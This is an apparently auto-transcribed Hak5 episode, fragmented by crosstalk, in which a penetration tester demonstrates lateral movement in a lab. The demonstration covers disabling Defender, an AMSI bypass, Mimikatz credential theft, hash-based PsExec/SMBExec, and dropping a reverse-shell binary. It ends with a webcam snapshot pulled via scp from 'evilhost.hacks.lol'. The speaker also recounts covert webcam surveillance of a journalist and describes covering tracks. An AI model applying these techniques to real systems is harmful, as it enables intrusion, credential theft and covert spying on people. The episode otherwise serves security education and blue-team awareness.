More shady fun hacks with Viss, this time on Hak5.
So now we have two shells, and we're starting to move around inside of the network.
And you never nmapped.
I have not scanned anything yet. I have not scanned a single thing. I'm turning off antivirus as I go, but if that's all that's happening, and I've seen this in the past, I'm sure a lot of other people have as well, people will turn AV off as a precaution because they're trying to install stuff that they don't want to install. They're trying to bypass application whitelisting, like users will try to do this, executives will try to do this. They'll want to install torrent clients or
Clearly,
games.
my esoteric 3D printer requires me to disable the antivirus before I install anything.
Love
those drivers.
Right? So this happens fairly common. It's not super uncommon to discover that people have turned off the virus protection on the corporate machines. In certain circumstances, this is controlled via GPO, and they can't. But in other circumstances, if they don't have an IT department or they have like a person that comes in once a month or what have you, this is very easy to do.
And they don't have skin in the game.
Right, they don't care. They're not on call. They're not going to get that 3 a.m. phone call that, oh my God, there's a virus or whatever.
And it's just you poking around on RDP and all the tools that are built in.
Correct. So at this point, we have 10.0.0.8. ipconfig tells us there is only one network interface, arp-a here.
So you do the same thing over and over and see, okay, well, if this one sees these guys, and then they tell two friends, and then what? Who are their two friends?
Yeah. So this machine, well, okay, we have a shell. It's great, just in case we need, in case the first one goes down.
Right, you've got a
we
second
still have a second one, so we'll just keep that one as a plan B. So, all right, so let's try .7 and see what we have there. So .7, okay, it looks familiar. I have a bunch of alerts. What do we have here? Same sort of stuff.
Deal.
Okay, threats found. Look at that. Somebody's been doing something. This thing,
and it's connected to the VPN.
Hey, the VPN is, interesting.
So now from this box, you can pivot to the rest of the joint.
Maybe. What does ipconfig tell us? ipconfig tells us that there is a second network interface on a 172 network.
Okay, that 172.27 is what, your VPN?
Yeah, it looks like.
All right.
Yeah, so if that's the case, then what does ARP tell us? Wait, I'm 18.
Yeah, you're 172.27.
I'm 18, and I'm seeing 1, which I'm guessing is the gateway.
That's probably the server. 17
and 19.
So now you're seeing additional hosts that are also on the VPN.
Ping 172.27.232.17. Nothing.
Shame.
Okay. .19. Hey, 19's alive.
All right.
Well, one good turn deserves another.
Right. Let's try the dir command.
dir 172.27.232.19 /c. Maybe $? Did I typo that? Oh, I did typo that. I put a slash. Hey! Okay, cool. So now we can see across the network. Great. So now we understand that this host is multi-homed and can see other machines that are connected to the VPN. So, what is there? Can I do net view? Will that work? It's been a very long time since I've messed with the net commands.
Which is mostly deprecated.
Yeah.
Like most things in Windows, they live on forever.
So let's try our existing methodology of checking Defender and seeing, up
and running and recent definitions.
Cool.
So I'm assuming where you're going to go from here.
Right.
Lather, rinse, repeat.
Pretty much. So we're just moving through the network, turning off. Come on. What are we doing? We're forgetting how to
into
copy
an RDP,
paste.
For one thing.
So that's done.
That's always the most fun.
All right, that works. Let's add our exclusion path.
Without fancy quotes.
Okay, and then we'll add our AMSI bypass. Okay, so that's all done. And then I can go back here, and then I can attempt this. Is it going to behave?
You selected. I hate that with the terminal in Windows. If you select even like a little box, it's like no.
Yup.
Yeah, copy and paste on Windows command prompt is just terrible.
There we go. So now we have defenders disabled.
And then it's in a pwnable state.
Did I get a shell? I did. So now I have shells on PopMe, internal 1 and internal 2. And this
And from here you can pivot
1.
through the rest of the network because it's connected to the VPN.
Well, we'd hope so. I mean, we figure this is what we've discovered thus far. It stands to reason that I should be able to do the same thing. So now what we need to do is interact with the shell that we know is multi-homed. And we'll do search module lateral movement. And we have all of our lateral movement options. Let's see if we can do something simple like invoke SMB exec. So let's do use module lateral movement, invoke SMB exec info, and we want to target, what do we want to target? What was it, 19, right?
That was the other box on this machine.
Yeah, so let's do set computer name 172.27.232.19. And we know the creds are the same. This one wants a hash, so we'll go and say, well, this one wants a hash, so we'll do back and we'll say, let's see here, use modules. Well, first, let's just make sure that we're up to snuff with all of our permissions. So we'll say use module privesc get system, because we're presuming that everything is the same everywhere. If I do get system, will I get a system shell? Maybe. Yes, I have a system shell. Okay, so now I can safely run things like Mimikatz, and we know that Defender's turned off. So we'll say back use module credentials, Mimikatz logon passwords, execute, and it will take a moment. The reason it takes a second is because Empire is asynchronous.
Okay.
The agent on the infected machine checks in every 5 seconds, and you can tune that and make it. Like you can say check in randomly between 1 and 60 seconds, so that it looks random on the network, and you can't see these little 5-second spikes if you're looking at a sim. And it checks in for a job, and then it runs the job, and then when it checks in again, it gives you the results of the job. So it takes a little longer.
Familiar with the fun of synchronous stuff.
So here we go. We got Mimikatz to run. We know what the credential is because we have it already, but now we have this NTLM hash. So let's steal this NTLM hash.
It's all about striking a balance.
Yeah. So let's say use module lateral movement. What do we say? SMB? What was it? Invoke SMB exec.
So
no, PS exec.
Yeah, that's kind of like PS exec, right?
What I did before was SMB exec, right?
Yeah.
Let's try that one. SMB, so set hash to this, and everything else is already populated. Execute. Let's see what happens. Command executed service, but no shell. Okay. Let's try use module lateral movement, invoke PS exec. Info set computer name. Okay, that's already populated. That's good. We don't have creds because it's going to try and reuse creds. Great. Execute. Okay. It's running. Nothing. No shell. Maybe I can try RDPing.
All right.
And what was it? 172.27.232.19, right?
You're RDP to an RDP to an RDP.
We must go deeper. That's right. Yeah. All we need is like some box called Ariadne at the very end or whatever. Yeah. Or a silly maze drawn in a circle. Okay, so no RDP. Interesting. Okay. All right. So we can see the box. Okay, so let's just try another simple test. Let's stop using the attack tools and let's just use the Windows tools and see what happens.
All right.
So same idea. Let's do dir //172.27.232.19 /C $. Okay.
There you go.
Shared
so
creds.
There's a machine,
So
shared creds.
now we understand that this is a shared credential. It might be an administrator's shared credential because it has access to all sorts of stuff, including machines that are connected to the VPN. Interesting point of fact. Why can this machine use the same credentials to talk to this machine and get a directory listing, but we can't get shells?
Good question. They clearly all have the same admin account.
They do. Maybe this machine is running Defender. Maybe there's antivirus running this machine, and this user is a little bit more paranoid than the other users. And actually,
well, now they're more interesting because everybody else seems to have been low-hanging fruit.
Yeah. So now what? Well, let's see if this machine, because it appears to be in a data center or in a cloud environment, doesn't have PS exec on it. It does. I wonder if this will work. PS exec 172.27.232.19 cmd.exe.
Oh, not calc?
Well, if we're under the presumption that I can't see this display,
I know, I'm joking.
Then
but clearly we have to open the calculator.
If
anyway,
go ahead. If your executive is on an aircraft, traveling for something, and they're connected to the work VPN while they're on the aircraft, and calc pops open,
big deal.
Yeah, they might poop a little.
Oops, I hit the calc key. That tends to end up on keyboards nowadays.
So we'll try it. We have host name.
Who am I?
This is some desktop. Okay, we have a shell, 3-layer, pop me, internal 1. Yeah, this is 3 layers deep. So we're 3 layers deep across RDP sessions and a VPN.
And I'm assuming at this point you're again going to lather, rinse, repeat.
Well,
or
let's try. Let's see what happens if we try. So we run this. Hey, it worked.
Nice.
Sweet.
Oh, hey, look what happened to this machine. Imagine that.
Yeah, so that's what when they say this is not OPSEC safe, that's what they're talking about. The advantage, though, is with Windows, that thing pops up and goes away in about 3 to 5 seconds.
Right.
If somebody's not looking at their display, or if they went to the restroom, or if their display is locked and they're at lunch, then that'll pop up and go away and they'll never see it. So this thing has a webcam. So, well, the presumption is let's presume that in this narrative we don't know this yet.
Right.
So, okay, we're disabling. We're 3 layers deep, disabling Windows Defender on a laptop that we're presuming is on a plane in flight somewhere.
That just makes the story better.
Yeah. So let's see here.
Head over to PowerShell, disable the rest of it.
Does this work interactively? Yes, it does.
Hey, well,
that's cool. I was unaware of that. I did not know that you could, because you can't do that in Metasploit or Empire. If you have a non-interactive shell, you're on PowerShell, it just hangs, and you have to Control-C out and do it again. So, what? This thing is possessed. I have no idea what that is.
That was kind of funny. I think it's your paste. Try it again. Right click. Okay, let's go for it. Whoa, I've never seen that before. Wow.
Great.
That's pretty cool.
We're doing it live.
Just type it out. Or was that its output from... What is that even trying to say? Oh, I think it's overwriting the terminal. Hit enter, give it a couple of carriage returns. Whoa.
All right, we're dealing with a slightly unstable environment.
That's fine. I've been on some VT100s that are a little bit more possessed.
This is bizarre. This is so weird. Why? Okay, cool.
I'm gonna go with it.
It works, not looking at gift hacks in the mouth. Great.
That's cute though.
Yeah. All right, so let's go back and get our launcher again. Let's see, listeners, launcher. Man, being able to type would really help. PowerShell.
That's hacker skill number 7.
Yeah, reading comprehension is way down here at like 40. So let's do this, and let's see if we can shell this remote laptop.
Oh boy.
Something tells me this isn't going to work.
I wonder what it is that's giving you that impression.
This is really weird.
This is cute though.
What are we going to do? Okay, so we
a file
we
slowly.
obviously have access to the system already.
Yeah.
Okay. there's a neat trick that you can do.
Because the C-suite officer here on the plane still not freaked out.
No, maybe he's talking to his neighbor. Maybe he's talking to the stewardess. Maybe he's getting a drink. Who knows? Whatever. Maybe he set the computer down, locked it, and then went to the restroom because there was something happening and he needed to do something or other.
Well, I'm the executive in this case, so
Sure.
I'm on an A380 and I'm at the bar in the back because we're flying Emirates.
Perfect.
Clearly.
Okay.
Gin and tonic all the way.
Yeah, and this thing is just syncing your Outlook mail.
Oh, and I just left it there unlocked too.
Sure, why not?
Of course, why not?
Right. So
We've all been on that flight.
So here we've encountered a position where we can't just copy paste PowerShell. Now what?
Write it to a file slowly.
Well, we could do that.
Or then we're leaving files on boxes, and that's never any fun.
Well, you can do it temporarily now that this host does not have. We've turned off Defender, so if we drop
Not gonna notice anything.
we can drop a binary on the machine, and we can run that binary, and then we can delete the binary, and it will persist in memory, and it won't stay on disk. Which means if Defender comes back to life, it may not find the thing on disk. It may find it in memory, but if we work quickly enough, maybe we'll find some interesting stuff on that laptop that we can get at.
Yeah.
So, for the sake of brevity, I have already created a stageless interpreter stageless interpreter HTTPS reverse shell, and I have a listener here, jobs-v. Yep. So I have my interpreter stageless reverse HTTPS listener on 8443, and I have my binary. So let's do this. Let's go back to Empire. And let's go agents, and we're on, what are we on? Internal. We need internal one, right? Host name, internal one.
And
perfect.
there you are.
All right, so we're on internal one. So let's do interact as a upload MSF hacks.exe to our whitelisted c:\hacks.exe.
I'd double click that.
Then we'll go cd backslash
And just exec it.
dir hacks.ex.
There it is.
Did I typo that? I did. Hacks.ex. Okay, so let's
It's
do
close enough. It'll almost execute.
Somebody else has obviously already been here. Move hacks.ex to hacks.exe. Okay, so if we run it, do we get? Yeah, we got a shell.
Yay.
Okay, so we have sessions-x. Cool. So now we have a shell. Perfect. That's going to be our plan B in case things break. It's always handy to have lots and lots of shells.
More shells is better.
Yeah, I would say a safe bet is between 5 and 10 per host, depending on what your objectives are on the engagement, what you're trying to do.
They tend to hang when you like to do fun things.
Yeah,
too much.
If you pivot scanning through these things, they will die. That's just life. Like if you want to conduct reconnaissance through interpreter shells, they will break at some point. So this is why we go back and forth between multiple C2s and RDP, because we're combining all of the use. Think of it this way: we're mechanics, and we have a toolbox, and the toolbox is full of a bunch of different tools.
Use them all.
And what we're doing is we're using all the requisite tools to do the job without, like, you've heard the phrase, when all you have is a hammer, everything looks like a nail.
Yep.
Well, we have a lot more than a hammer.
Sure.
So we're taking advantage of our cornucopia of interesting hacks. So here we are, we have this binary. We know it works. It's phoned home. We have one shell. There's a really interesting thing you can do with like doing like dir //172 dot, was it 27.232.19 c $. Okay, so that still works.
Still in that box.
Great. So let's try copy hacks.exe to //172.27.232.19 /c $. Sure. Okay, that worked.
Great.
Now let's do
psexec.
psexec. Yep. 172.27.232.19 /hacks.exe, and let's keep this alive. Let's hit enter and then Alt tab really quick. Too fast. Come on, what are we doing? Hitting it.
No, you have to. There you go.
What?
You had a selection, so you.
Oh, I'm doing it wrong. It's a syntax problem.
There we go.
Do we get shell? Oh, maybe it wants a full path. Yeah, cool.
Wahoo.
So now we have remotely shelled.
Well, at this point, we've got like every box you've come across.
So far, it looks like it's, yeah, it took a second to stage itself up. Sessions -I4. Sysinfo.
And so now you're
what do
on
we
the machine on the plane. Yeah?
Yeah, but it's really slow.
Well, dude, you've gone through how many different ops?
We're 3 layers deep.
Okay.
So things are going to get weird. Let's see if we can pop a shell. Hey, got a shell. So now we have an interactive shell on the remote box. Great.
So what's the first thing that you do to freak out the C-suite?
Well, instead of freaking people out, let's go to the users directory and see who exists. Mr. Hacks, Public, and Shannon.
I think this is actually Shannon's old machine.
Well, let's investigate. CD Mr. Hacks. There's some stuff. Oh, look, an open VPN tray log. That suggests that this user has been on this machine doing things. So let's go to the desktop and dir secrets.txt.
No, the secrets. Type secrets.
Super secret docs.
The cat's out of the bag.
Well,
indeed, super secret
so let's
docs.
do list webcams. Is it?
Shame. You got him.
Where is it? Oh, webcam. I did it backwards. Webcam list. In webcam snap. Oops. What's my syntax? Is it dash P? Okay, dash P, and we'll call it root tools MSF hacks.jpg. It got a frame. Let's see. Oh, actually, I don't need to put that in the background. I can just go to my other shell here and say ls_star.jpg, hacks.jpg. Great. So let's do scp root at evilhost.hacks.lol tools msf hacks.jpg to here. Open hacks.jpg. Hey, look at that.
Hey, fantastic.
So, doing this to a person that's actually on a plane,
that would freak them out.
They have no idea it's happening, but it is greatly rewarding.
And then you paint the picture of how you got there.
It is, yeah. So if you may remember a year and a half ago, like I was on this documentary that they asked me to do that to a journalist, and I did that. I had this like effectively in a loop. We put together a suite of tools that was cobbled together between multiple C2s and a whole bunch of custom glue that was taking screenshots every 5 minutes forever until we turned it off. And I had a screenshot and a webcam picture of this poor journalist on a plane to DEF CON. He was on his flight. He was on a flight to DEF CON, and he was the screenshot was he was trying to load Facebook, and the Facebook it was complaining it couldn't reach the server. But I kept getting webcam pictures and desktop pictures from him during his flight. I was eating up all his bandwidth.
Oh my gosh.
And he couldn't do his normal stuff because my surveillance badness was. Yeah. So
Not a whole lot of bandwidth on a plane.
Supremely rewarding. It wasn't 3 shells deep.
Yeah.
But it's still supremely rewarding.
No joke.
Yeah. So no scanning. None. There was 0 scanning done through all of this. We were able to pivot 3 shells deep, traverse a VPN, exfiltrate data from everywhere, turn off Windows Defender as we went. And then realistically, if you wanted to sort of cover your tracks, you could just turn Windows Defender back on and then quietly remove your shell. Or you could say, set a scheduled job to turn Windows Defender on in 15 minutes and then close your shell, and then Windows Defender will come back to life.
Never seen anything.
Yep. So yeah, fun times.
Wow. Okay, cool. So what's your major takeaway then for the blue team on this?
Well, the blue team should not spend their entire time looking at a single pane of glass. And it is probably wise to consider that attackers know maybe as much as, sometimes in rare cases, more than you do about your own network. If an attacker can gain access to an environment and steal credentials, they don't need hacker tools anymore. They can just VPN under the guise of another employee. And if you have a VPN server that has hundreds or potentially thousands of users, it is not unreasonable to believe that users will come and go randomly from different IP addresses as they travel, as they go to cafes and
normal
hotels.
stuff.
Yeah. So if you look like a user and you act like a user, there's nothing suspicious going on.
All right.
If you're a bad guy, then what you do is you take a sheep and well, I was gonna say you slice them open and you take their skin and you wear it, but maybe that's a little extreme.
That is a bit.
In this case, you basically just clone them and you put on the clone and
Like
now
Dolly.
you are, yeah,
The sheep.
yeah, that's right.
Okay. That was a lot of fun.
Yeah.
Viss, thanks for opening our eyes to what's possible when you pretend to be a user.
Yeah, fun times.
Okay. That was awesome. Hey, where can people find all the fun, interesting things that you do, Viss?
So I'm on Twitter. I spend a lot of time being obstinate and shouty. My handle is Viss, V-I-S-S, on Twitter. I run a company called Phobos Group, and we're located at phobos.io, P-H-O-B-O-S. And we're basically hired bad guys.
If you see this man at DEF CON, go up to him and say, hey, do bad things, and also can I have some of your Doom stickers?
Oh, yeah. All those Doom stickers are from us.
I love the Phobos tie-in.
Great.
Yeah. Yeah, my inner 13-year-old is like, yes.
Same
thing with all the hacks.
Oh, absolutely.
Cool. Viss, that was so much fun.
Cheers, thanks, man.
Wait to have you on again. This was really a blast.
Yeah, thanks for having me.
Cool. All right, we will see you next time. Until then, I'm Darren Kitchen.
I'm Viss.
Trust your technolist.
See ya, Internet.
Domain.com has all your website needs, from .com and .net domains to intuitive website builders, so you can take that first step in creating your online identity. Let me tell you, there's no domain extension like a .com or a .net, or if you want to brand yourself, Domain.com has over 300 domain extensions like .club and .space. These guys are huge fans of Hak5. They're affordable, reliable. We've been using them for years. They've got all the tools you need to share your ideas with the world. And because they're such big fans, they are hooking you up with 15% off their already affordable prices. So get domain names and web hosting and email, and just be sure to use that coupon code HAK5. So when you think domain names, think Domain.com.